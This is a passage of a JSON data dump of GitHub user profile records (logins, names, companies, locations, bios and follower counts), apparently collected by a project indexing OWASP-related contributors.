"nest_created_at": "2024-09-12T01:19:35.547Z", + "nest_updated_at": "2024-09-22T20:27:42.703Z", + "name": "Jeffrey Walton", + "login": "noloader", + "email": "noloader, gmail account", + "avatar_url": "https://avatars.githubusercontent.com/u/3538226?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 149, + "public_gists_count": 0, + "public_repositories_count": 43, + "created_at": "2013-02-12T03:23:56Z", + "updated_at": "2024-08-26T11:25:08Z", + "node_id": "MDQ6VXNlcjM1MzgyMjY=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2356, + "fields": { + "nest_created_at": "2024-09-12T01:19:36.379Z", + "nest_updated_at": "2024-09-12T01:19:36.379Z", + "name": "", + "login": "mirasifali", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19987388?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2016-06-17T03:47:40Z", + "updated_at": "2024-06-24T10:07:20Z", + "node_id": "MDQ6VXNlcjE5OTg3Mzg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2357, + "fields": { + "nest_created_at": "2024-09-12T01:19:38.208Z", + "nest_updated_at": "2024-09-12T01:19:38.208Z", + "name": "", + "login": "NeilOconner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/141781845?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-08-08T21:31:57Z", + "updated_at": "2023-08-24T07:10:14Z", + "node_id": "U_kgDOCHNrVQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2358, + "fields": { + "nest_created_at": "2024-09-12T01:19:39.008Z", + "nest_updated_at": "2024-09-22T19:37:59.223Z", + "name": "Risto McGehee", + "login": "risto-liftoff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/133720088?v=4", + "company": "Liftoff", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2023-05-15T23:56:01Z", + "updated_at": "2024-07-19T16:27:23Z", + "node_id": "U_kgDOB_hoGA", + "bio": "Security Engineer at Liftoff", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2359, + "fields": { + "nest_created_at": "2024-09-12T01:19:39.808Z", + "nest_updated_at": "2024-09-12T01:19:39.808Z", + "name": "", + "login": "brunomcuesta", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/816237?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 5, + "public_repositories_count": 5, + "created_at": "2011-05-28T20:02:23Z", + "updated_at": "2024-07-05T14:41:34Z", + "node_id": "MDQ6VXNlcjgxNjIzNw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2360, + "fields": { + "nest_created_at": "2024-09-12T01:19:40.695Z", + "nest_updated_at": "2024-09-12T01:19:40.695Z", + "name": "Alex Brenes", + "login": "alexbrenes", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/70926767?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2020-09-08T01:47:32Z", + "updated_at": "2024-07-23T18:00:37Z", + "node_id": "MDQ6VXNlcjcwOTI2NzY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2361, + "fields": { + "nest_created_at": "2024-09-12T01:19:41.513Z", + "nest_updated_at": "2024-09-22T19:37:57.473Z", + "name": "Ralph Mei", + "login": "r-heimann", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121236014?v=4", + "company": "DB Systel", + "location": "Erfurt, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-12-22T12:35:17Z", + "updated_at": "2024-07-03T08:17:44Z", + "node_id": "U_kgDOBznqLg", + "bio": "Cloud Administrator @dbsystel", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2362, + "fields": { + "nest_created_at": "2024-09-12T01:20:21.522Z", + "nest_updated_at": "2024-09-22T19:38:59.256Z", + "name": "OWASP Benchmark", + "login": "OWASP-Benchmark", + "email": "dave.wichers@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/80600360?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 40, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-03-13T20:14:53Z", + "updated_at": "2024-04-01T16:26:06Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjgwNjAwMzYw", + "bio": "This is the home for all the OWASP Benchmark related projects. The primary project is BenchmarkJava (what was just 'the OWASP Benchmark' previously).", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2363, + "fields": { + "nest_created_at": "2024-09-12T01:20:25.813Z", + "nest_updated_at": "2024-09-12T01:20:25.813Z", + "name": "", + "login": "l34d51n63r", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12156639?v=4", + "company": "", + "location": "Karlsruhe", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-04-28T16:27:04Z", + "updated_at": "2024-09-06T07:53:24Z", + "node_id": "MDQ6VXNlcjEyMTU2NjM5", + "bio": "Security Researcher", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2364, + "fields": { + "nest_created_at": "2024-09-12T01:20:26.620Z", + "nest_updated_at": "2024-09-12T01:20:26.620Z", + "name": "", + "login": "thornmaker", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13333288?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2015-07-14T13:24:04Z", + "updated_at": "2024-01-14T01:33:51Z", + "node_id": "MDQ6VXNlcjEzMzMzMjg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2365, + "fields": { + "nest_created_at": "2024-09-12T01:20:28.664Z", + "nest_updated_at": "2024-09-22T20:29:41.913Z", + "name": "", + "login": "javabeanz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3225772?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2013-01-09T13:07:35Z", + "updated_at": "2024-09-19T11:28:56Z", + "node_id": "MDQ6VXNlcjMyMjU3NzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2366, + "fields": { + "nest_created_at": "2024-09-12T01:20:29.947Z", + "nest_updated_at": "2024-09-12T01:20:29.947Z", + "name": "", + "login": "maksim-pinguin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33628723?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2017-11-13T13:59:13Z", + "updated_at": "2024-08-24T14:59:24Z", + "node_id": "MDQ6VXNlcjMzNjI4NzIz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2367, + "fields": { + "nest_created_at": "2024-09-12T01:20:30.815Z", + "nest_updated_at": "2024-09-12T01:20:30.815Z", + "name": "akhvee", + "login": "akhvee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1526307?v=4", + "company": "Software Engineer", + "location": "Santa Clara, CA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2012-03-11T18:28:23Z", + "updated_at": "2024-03-17T03:50:30Z", + "node_id": "MDQ6VXNlcjE1MjYzMDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2368, + "fields": { + "nest_created_at": "2024-09-12T01:20:31.660Z", + "nest_updated_at": "2024-09-12T01:20:31.660Z", + "name": "maltek", + "login": "maltek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1694194?v=4", + "company": "", + "location": "DE", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2012-04-30T23:49:13Z", + "updated_at": "2024-05-15T10:33:42Z", + "node_id": "MDQ6VXNlcjE2OTQxOTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2369, + "fields": { + "nest_created_at": "2024-09-12T01:20:33.325Z", + "nest_updated_at": "2024-09-12T01:20:33.325Z", + "name": "Mahdi Rezaie", + "login": "mahdirezaie336", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61153639?v=4", + "company": "Amirkabir University of Technology", + "location": "Tehran, Iran", + "collaborators_count": 0, + "following_count": 101, + "followers_count": 98, + "public_gists_count": 0, + "public_repositories_count": 43, + "created_at": "2020-02-17T14:43:46Z", + "updated_at": "2024-09-11T20:22:45Z", + "node_id": "MDQ6VXNlcjYxMTUzNjM5", + "bio": "CE Student at AUT", + "is_hireable": true, + "twitter_username": "mahdirezaie336" + } +}, +{ + "model": "github.user", + "pk": 2370, + "fields": { + "nest_created_at": "2024-09-12T01:20:34.145Z", + "nest_updated_at": "2024-09-22T20:30:27.732Z", + "name": "", + "login": "thc202", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4639210?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 143, + "public_gists_count": 0, + "public_repositories_count": 66, + "created_at": "2013-06-07T10:28:09Z", + "updated_at": "2024-09-21T09:09:09Z", + "node_id": "MDQ6VXNlcjQ2MzkyMTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2371, + "fields": { + "nest_created_at": "2024-09-12T01:20:46.111Z", + "nest_updated_at": "2024-09-22T19:38:47.371Z", + "name": "", + "login": "dandersonaspect", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10606605?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-01-20T01:35:05Z", + "updated_at": "2021-10-21T18:14:53Z", + "node_id": "MDQ6VXNlcjEwNjA2NjA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2372, + "fields": { + "nest_created_at": "2024-09-12T01:20:48.303Z", + "nest_updated_at": "2024-09-22T19:39:03.351Z", + "name": "Sascha Knoop", + "login": "darkspirit510", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17259447?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-02-15T21:12:06Z", + "updated_at": "2024-07-29T09:36:03Z", + "node_id": "MDQ6VXNlcjE3MjU5NDQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2373, + "fields": { + "nest_created_at": "2024-09-12T01:20:49.915Z", + "nest_updated_at": "2024-09-12T01:20:49.915Z", + "name": "", + "login": "njarbot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73914352?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-11-03T22:10:13Z", + "updated_at": "2024-08-27T12:29:05Z", + "node_id": "MDQ6VXNlcjczOTE0MzUy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2374, + "fields": { + "nest_created_at": "2024-09-12T01:20:50.727Z", + "nest_updated_at": "2024-09-22T19:39:01.883Z", + "name": "Philippe ", + "login": "Qwarctick", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31954718?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2017-09-14T09:29:18Z", + "updated_at": "2024-09-14T20:36:34Z", + "node_id": "MDQ6VXNlcjMxOTU0NzE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2375, + "fields": { + "nest_created_at": "2024-09-12T01:20:58.441Z", + "nest_updated_at": "2024-09-22T19:42:55.172Z", + "name": "Dependency-Track", + "login": "DependencyTrack", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40258585?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 265, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2018-06-14T06:02:36Z", + "updated_at": "2024-09-01T11:32:48Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjQwMjU4NTg1", + "bio": "Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain", + "is_hireable": false, + "twitter_username": "DependencyTrack" + } +}, +{ + "model": "github.user", + "pk": 2376, + "fields": { + "nest_created_at": "2024-09-12T01:21:05.956Z", + "nest_updated_at": "2024-09-14T19:17:42.741Z", + "name": "", + "login": "sonatype-depshield[bot]", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/in/13833?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-06-20T22:30:15Z", + "updated_at": "2018-07-23T20:22:50Z", + "node_id": "MDM6Qm90NDA0NDM2MjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2377, + "fields": { + "nest_created_at": "2024-09-12T01:21:10.953Z", + "nest_updated_at": "2024-09-22T19:39:39.900Z", + "name": "Ed Snible", + "login": "esnible", + "email": "esnible@acm.org", + "avatar_url": "https://avatars.githubusercontent.com/u/3237651?v=4", + "company": "@IBM @ibm-research and Red Hat partner engineer", + "location": "Bronx, NY", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 28, + "public_gists_count": 0, + "public_repositories_count": 38, + "created_at": "2013-01-10T18:35:14Z", + "updated_at": "2024-09-05T17:11:41Z", + "node_id": "MDQ6VXNlcjMyMzc2NTE=", + "bio": "Software engineer at IBM TJ Watson Research Center.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2378, + "fields": { + "nest_created_at": "2024-09-12T01:21:25.780Z", + "nest_updated_at": "2024-09-12T01:21:25.780Z", + "name": "Konstantin Shemyak", + "login": "KonstantinShemyak", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3096603?v=4", + "company": "", + "location": "Finland", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2012-12-21T08:24:51Z", + "updated_at": "2024-08-11T14:25:50Z", + "node_id": "MDQ6VXNlcjMwOTY2MDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2379, + "fields": { + "nest_created_at": "2024-09-12T01:21:28.759Z", + "nest_updated_at": "2024-09-12T01:21:32.108Z", + "name": "", + "login": "StephenTrombetti", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3828025?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-03-11T03:29:56Z", + "updated_at": "2024-05-30T17:32:38Z", + "node_id": "MDQ6VXNlcjM4MjgwMjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2380, + "fields": { + "nest_created_at": "2024-09-12T01:21:37.976Z", + "nest_updated_at": "2024-09-12T01:21:39.221Z", + "name": "", + "login": "stboissdev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24654609?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2016-12-19T15:03:13Z", + "updated_at": "2024-09-04T12:47:46Z", + "node_id": "MDQ6VXNlcjI0NjU0NjA5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2381, + "fields": { + "nest_created_at": "2024-09-12T01:21:40.908Z", + "nest_updated_at": "2024-09-12T01:21:40.908Z", + "name": "", + "login": "Arunraj89", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16404627?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-12-22T18:02:54Z", + "updated_at": "2021-02-18T11:14:53Z", + "node_id": "MDQ6VXNlcjE2NDA0NjI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2382, + "fields": { + "nest_created_at": "2024-09-12T01:22:00.292Z", + "nest_updated_at": "2024-09-12T01:22:55.710Z", + "name": "Drew", + "login": "Drewster727", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4528753?v=4", + "company": "", + "location": "Kansas City", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 22, + "public_gists_count": 4, + "public_repositories_count": 46, + "created_at": "2013-05-25T19:15:23Z", + "updated_at": "2024-09-11T20:58:13Z", + "node_id": "MDQ6VXNlcjQ1Mjg3NTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2383, + "fields": { + "nest_created_at": "2024-09-12T01:22:03.693Z", + "nest_updated_at": "2024-09-12T01:23:28.412Z", + "name": "", + "login": "joergsesterhenn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/974666?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2011-08-11T19:42:16Z", + "updated_at": "2024-08-01T09:21:44Z", + "node_id": "MDQ6VXNlcjk3NDY2Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2384, + "fields": { + "nest_created_at": "2024-09-12T01:22:13.763Z", + "nest_updated_at": "2024-09-16T22:28:25.947Z", + "name": "", + "login": "security101", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6241898?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2013-12-22T15:46:01Z", + "updated_at": "2024-01-16T16:31:29Z", + "node_id": "MDQ6VXNlcjYyNDE4OTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2385, + "fields": { + "nest_created_at": "2024-09-12T01:22:17.104Z", + "nest_updated_at": "2024-09-22T19:40:07.942Z", + "name": "Melba", + "login": "melba-lopez", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101211710?v=4", + "company": "@IBM ", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2022-03-08T18:45:02Z", + "updated_at": "2024-07-10T14:39:20Z", + "node_id": "U_kgDOBghePg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2386, + "fields": { + "nest_created_at": "2024-09-12T01:22:23.879Z", + "nest_updated_at": "2024-09-12T01:22:23.879Z", + "name": "", + "login": "mbayrak78", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33459119?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-11-07T15:31:56Z", + "updated_at": "2021-04-22T11:44:08Z", + "node_id": "MDQ6VXNlcjMzNDU5MTE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2387, + "fields": { + "nest_created_at": "2024-09-12T01:22:59.888Z", + "nest_updated_at": "2024-09-12T01:22:59.888Z", + "name": "Hannes Scholte", + "login": "HSSE-Dev", + "email": "hsse-development@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23707828?v=4", + "company": "CIDEON Software & Services GmbH", + "location": "Görlitz, Germany", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-11-23T20:35:50Z", + "updated_at": "2024-08-08T11:36:05Z", + "node_id": "MDQ6VXNlcjIzNzA3ODI4", + "bio": "I am a software developer at CIDEON Software & Services GmbH & Co. KG in Görlitz, Germany. \r\nI work on various projects and technologies.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2388, + "fields": { + "nest_created_at": "2024-09-12T01:23:01.742Z", + "nest_updated_at": "2024-09-22T19:38:23.396Z", + "name": "Chris Sansone", + "login": "chris-sansone-angi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51127567?v=4", + "company": "Angi", + "location": "New York", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-05-28T15:09:43Z", + "updated_at": "2024-04-16T20:11:42Z", + "node_id": "MDQ6VXNlcjUxMTI3NTY3", + "bio": "Director of Security at Angi | Personal GitHub Account: @chrissansone", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2389, + "fields": { + "nest_created_at": "2024-09-12T01:23:11.495Z", + "nest_updated_at": "2024-09-12T01:23:11.495Z", + "name": "&γ", + "login": "theCamelCaser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22252950?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-09-17T07:10:38Z", + "updated_at": "2024-06-17T06:37:47Z", + "node_id": "MDQ6VXNlcjIyMjUyOTUw", + "bio": "¯\\_(ツ)_/¯", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2390, + "fields": { + "nest_created_at": "2024-09-12T01:23:13.187Z", + "nest_updated_at": "2024-09-12T01:23:13.187Z", + "name": "Marc", + "login": "pachulo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3256953?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 24, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2013-01-13T10:19:33Z", + "updated_at": "2024-09-03T22:24:58Z", + "node_id": "MDQ6VXNlcjMyNTY5NTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2391, + "fields": { + "nest_created_at": "2024-09-12T01:23:16.567Z", + "nest_updated_at": "2024-09-22T19:42:09.685Z", + "name": "Cédric Menzi", + "login": "cmenzi", + "email": "cedric.menzi@buhlergroup.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1763806?v=4", + "company": "Bühler AG", + "location": "Uzwil, Switzerland", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 21, + "public_gists_count": 2, + "public_repositories_count": 36, + "created_at": "2012-05-22T09:37:18Z", + "updated_at": "2024-08-28T11:24:42Z", + "node_id": "MDQ6VXNlcjE3NjM4MDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2392, + "fields": { + "nest_created_at": "2024-09-12T01:23:32.554Z", + "nest_updated_at": "2024-09-12T01:23:32.554Z", + "name": "Steve Abbagnaro", + "login": "SteveAbb", + "email": "steve@abbagnaro.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5322003?v=4", + "company": "", + "location": "CT", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2013-08-27T14:46:02Z", + "updated_at": "2024-08-12T14:16:19Z", + "node_id": "MDQ6VXNlcjUzMjIwMDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2393, + "fields": { + "nest_created_at": "2024-09-12T01:23:37.994Z", + "nest_updated_at": "2024-09-12T01:23:37.994Z", + "name": "Grégory Romé", + "login": "gpr", + "email": "gregory.rome@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/309019?v=4", + "company": "PayFit", + "location": "Louveciennes", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 27, + "public_repositories_count": 42, + "created_at": "2010-06-18T21:19:28Z", + "updated_at": "2024-08-28T16:10:26Z", + "node_id": "MDQ6VXNlcjMwOTAxOQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2394, + "fields": { + "nest_created_at": "2024-09-12T01:23:40.498Z", + "nest_updated_at": "2024-09-22T19:42:26.861Z", + "name": "", + "login": "technoo10201", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31561379?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2017-09-02T07:08:56Z", + "updated_at": "2024-08-21T21:15:10Z", + "node_id": "MDQ6VXNlcjMxNTYxMzc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2395, + "fields": { + "nest_created_at": "2024-09-12T01:23:42.182Z", + "nest_updated_at": "2024-09-22T16:33:04.077Z", + "name": "", + "login": "morganmccarley", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4392342?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-05-10T02:03:31Z", + "updated_at": "2022-06-22T16:11:39Z", + "node_id": "MDQ6VXNlcjQzOTIzNDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2396, + "fields": { + "nest_created_at": "2024-09-12T01:23:43.471Z", + "nest_updated_at": "2024-09-18T00:18:11.794Z", + "name": "Petr H", + "login": "hostalp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47250981?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-02-01T15:14:54Z", + "updated_at": "2022-11-10T17:08:05Z", + "node_id": "MDQ6VXNlcjQ3MjUwOTgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2397, + "fields": { + "nest_created_at": "2024-09-12T01:23:56.619Z", + "nest_updated_at": "2024-09-22T19:42:02.316Z", + "name": "Roy Chen", + "login": "roycyt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3922108?v=4", + "company": "", + "location": "Taipei, Taiwan", + "collaborators_count": 0, + "following_count": 338, + "followers_count": 29, + "public_gists_count": 16, + "public_repositories_count": 59, + "created_at": "2013-03-20T15:20:40Z", + "updated_at": "2024-08-31T07:11:06Z", + "node_id": "MDQ6VXNlcjM5MjIxMDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2398, + "fields": { + "nest_created_at": "2024-09-12T01:23:58.864Z", + "nest_updated_at": "2024-09-12T01:23:58.864Z", + "name": "", + "login": "nickwilliams-codynamic", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45215237?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 2, + "public_repositories_count": 5, + "created_at": "2018-11-20T21:37:46Z", + "updated_at": "2024-09-02T02:15:18Z", + "node_id": "MDQ6VXNlcjQ1MjE1MjM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2399, + "fields": { + "nest_created_at": "2024-09-12T01:24:02.169Z", + "nest_updated_at": "2024-09-22T19:42:32.268Z", + "name": "Michael Gissing", + "login": "scolytus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1374754?v=4", + "company": "", + "location": "Graz, Austria", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2012-01-24T12:40:16Z", + "updated_at": "2020-08-10T06:07:02Z", + "node_id": "MDQ6VXNlcjEzNzQ3NTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2400, + "fields": { + "nest_created_at": "2024-09-12T01:24:03.841Z", + "nest_updated_at": "2024-09-22T20:21:42.803Z", + "name": "Charles Howes", + "login": "PenelopeFudd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1606480?v=4", + "company": "@netskrt", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": 